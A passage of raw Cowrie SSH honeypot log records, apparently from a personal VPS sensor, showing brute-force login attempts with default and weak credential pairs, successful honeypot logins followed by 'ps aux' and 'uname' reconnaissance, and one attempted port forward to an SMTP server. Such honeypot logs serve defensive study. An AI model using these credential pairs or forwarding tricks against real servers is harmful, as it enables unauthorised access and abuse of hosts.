2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:30:25.555103Z","src_ip":"212.227.125.160","session":"e96c0424e523"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63892,"dst_ip":"1.2.3.4","dst_port":22,"session":"99ebb74a55a1","protocol":"ssh","message":"New connection: 212.227.235.229:63892 (1.2.3.4:22) [session: 99ebb74a55a1]","sensor":"my-vps","timestamp":"2025-08-31T03:30:27.302211Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T03:30:27.302903Z","src_ip":"212.227.235.229","session":"99ebb74a55a1"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T03:30:27.460721Z","src_ip":"212.227.235.229","session":"99ebb74a55a1"}
{"eventid":"cowrie.login.failed","username":"guest","password":"root123","message":"login attempt [guest/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:30:27.739674Z","src_ip":"212.227.125.160","session":"e96c0424e523"}
{"eventid":"cowrie.login.success","username":"root","password":"33457577","message":"login attempt [root/33457577] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:30:27.816420Z","src_ip":"212.227.125.160","session":"327eee462035"}
{"eventid":"cowrie.login.success","username":"root","password":"123456789","message":"login attempt [root/123456789] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:30:28.075447Z","src_ip":"212.227.235.229","session":"99ebb74a55a1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"212.227.235.229","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-31T03:30:28.205445Z","session":"99ebb74a55a1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-31T03:30:28.334917Z","src_ip":"212.227.235.229","session":"99ebb74a55a1"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:30:28.465163Z","src_ip":"212.227.235.229","session":"99ebb74a55a1"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:30:29.202400Z","src_ip":"212.227.125.160","session":"e96c0424e523"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:30:30.359072Z","src_ip":"212.227.125.160","session":"327eee462035"}
{"eventid":"cowrie.command.input","input":"ps aux | head -10","message":"CMD: ps aux | head -10","sensor":"my-vps","timestamp":"2025-08-31T03:30:30.359870Z","src_ip":"212.227.125.160","session":"327eee462035"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","size":28,"shasum":"e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767 after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:30:31.744590Z","src_ip":"212.227.125.160","session":"327eee462035"}
{"eventid":"cowrie.session.closed","duration":"11.5","message":"Connection lost after 11.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:30:31.745704Z","src_ip":"212.227.125.160","session":"327eee462035"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":57586,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b8db5c5b7ae","protocol":"ssh","message":"New connection: 201.148.180.50:57586 (1.2.3.4:22) [session: 4b8db5c5b7ae]","sensor":"my-vps","timestamp":"2025-08-31T03:30:37.801269Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:30:38.818116Z","src_ip":"201.148.180.50","session":"4b8db5c5b7ae"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:30:38.819330Z","src_ip":"201.148.180.50","session":"4b8db5c5b7ae"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":42400,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b23021916df","protocol":"ssh","message":"New connection: 41.226.27.251:42400 (1.2.3.4:22) [session: 3b23021916df]","sensor":"my-vps","timestamp":"2025-08-31T03:30:41.178463Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:30:41.196745Z","src_ip":"41.226.27.251","session":"3b23021916df"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:30:41.227946Z","src_ip":"41.226.27.251","session":"3b23021916df"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"dolphinscheduler","message":"login attempt [dolphinscheduler/dolphinscheduler] failed","sensor":"my-vps","timestamp":"2025-08-31T03:30:41.430149Z","src_ip":"41.226.27.251","session":"3b23021916df"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:30:42.625095Z","src_ip":"41.226.27.251","session":"3b23021916df"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty123","message":"login attempt [root/qwerty123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:30:43.828498Z","src_ip":"212.227.235.229","session":"24b5445c7000"}
{"eventid":"cowrie.login.success","username":"root","password":"33457577","message":"login attempt [root/33457577] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:30:44.493120Z","src_ip":"201.148.180.50","session":"4b8db5c5b7ae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60062,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e80cd19b9f1","protocol":"ssh","message":"New connection: 212.227.125.160:60062 (1.2.3.4:22) [session: 7e80cd19b9f1]","sensor":"my-vps","timestamp":"2025-08-31T03:30:45.353825Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:30:47.087473Z","src_ip":"201.148.180.50","session":"4b8db5c5b7ae"}
{"eventid":"cowrie.command.input","input":"ps aux | head -10","message":"CMD: ps aux | head -10","sensor":"my-vps","timestamp":"2025-08-31T03:30:47.088243Z","src_ip":"201.148.180.50","session":"4b8db5c5b7ae"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","size":28,"shasum":"e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","duplicate":true,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767 after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:30:48.704427Z","src_ip":"201.148.180.50","session":"4b8db5c5b7ae"}
{"eventid":"cowrie.session.closed","duration":"10.9","message":"Connection lost after 10.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:30:48.731403Z","src_ip":"201.148.180.50","session":"4b8db5c5b7ae"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":56424,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f5ede1a90bd","protocol":"ssh","message":"New connection: 41.226.27.251:56424 (1.2.3.4:22) [session: 6f5ede1a90bd]","sensor":"my-vps","timestamp":"2025-08-31T03:31:01.357086Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:31:01.432083Z","src_ip":"41.226.27.251","session":"6f5ede1a90bd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:31:01.433125Z","src_ip":"41.226.27.251","session":"6f5ede1a90bd"}
{"eventid":"cowrie.login.success","username":"root","password":"passwd","message":"login attempt [root/passwd] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:31:01.624594Z","src_ip":"41.226.27.251","session":"6f5ede1a90bd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:31:01.741055Z","src_ip":"41.226.27.251","session":"6f5ede1a90bd"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:31:01.741919Z","src_ip":"41.226.27.251","session":"6f5ede1a90bd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:31:01.790786Z","src_ip":"41.226.27.251","session":"6f5ede1a90bd"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:31:01.792058Z","src_ip":"41.226.27.251","session":"6f5ede1a90bd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38892,"dst_ip":"1.2.3.4","dst_port":22,"session":"13304e63a8fb","protocol":"ssh","message":"New connection: 212.227.235.229:38892 (1.2.3.4:22) [session: 13304e63a8fb]","sensor":"my-vps","timestamp":"2025-08-31T03:31:02.748274Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:31:03.507355Z","src_ip":"212.227.125.160","session":"7e80cd19b9f1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:31:03.508134Z","src_ip":"212.227.125.160","session":"7e80cd19b9f1"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:31:03.561056Z","src_ip":"212.227.235.229","session":"13304e63a8fb"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:31:03.562307Z","src_ip":"212.227.235.229","session":"13304e63a8fb"}
{"eventid":"cowrie.login.failed","username":"guest","password":"P@ssw0rd123","message":"login attempt [guest/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:31:09.381586Z","src_ip":"212.227.235.229","session":"13304e63a8fb"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:31:11.115136Z","src_ip":"212.227.235.229","session":"13304e63a8fb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:31:19.475523Z","src_ip":"212.227.235.229","session":"24b5445c7000"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:31:19.476361Z","src_ip":"212.227.235.229","session":"24b5445c7000"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":49188,"dst_ip":"1.2.3.4","dst_port":22,"session":"0286c0b84a7f","protocol":"ssh","message":"New connection: 41.226.27.251:49188 (1.2.3.4:22) [session: 0286c0b84a7f]","sensor":"my-vps","timestamp":"2025-08-31T03:31:21.777597Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:31:21.778334Z","src_ip":"41.226.27.251","session":"0286c0b84a7f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:31:21.826340Z","src_ip":"41.226.27.251","session":"0286c0b84a7f"}
{"eventid":"cowrie.login.failed","username":"yarn","password":"yarn","message":"login attempt [yarn/yarn] failed","sensor":"my-vps","timestamp":"2025-08-31T03:31:22.058048Z","src_ip":"41.226.27.251","session":"0286c0b84a7f"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:31:23.301814Z","src_ip":"41.226.27.251","session":"0286c0b84a7f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57534,"dst_ip":"1.2.3.4","dst_port":22,"session":"5954760a8614","protocol":"ssh","message":"New connection: 212.227.125.160:57534 (1.2.3.4:22) [session: 5954760a8614]","sensor":"my-vps","timestamp":"2025-08-31T03:31:23.594005Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42340,"dst_ip":"1.2.3.4","dst_port":22,"session":"16b3fdf5338d","protocol":"ssh","message":"New connection: 212.227.125.160:42340 (1.2.3.4:22) [session: 16b3fdf5338d]","sensor":"my-vps","timestamp":"2025-08-31T03:31:23.632795Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:31:23.633459Z","src_ip":"212.227.125.160","session":"16b3fdf5338d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:31:23.881098Z","src_ip":"212.227.125.160","session":"16b3fdf5338d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:31:24.113634Z","src_ip":"212.227.125.160","session":"5954760a8614"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecds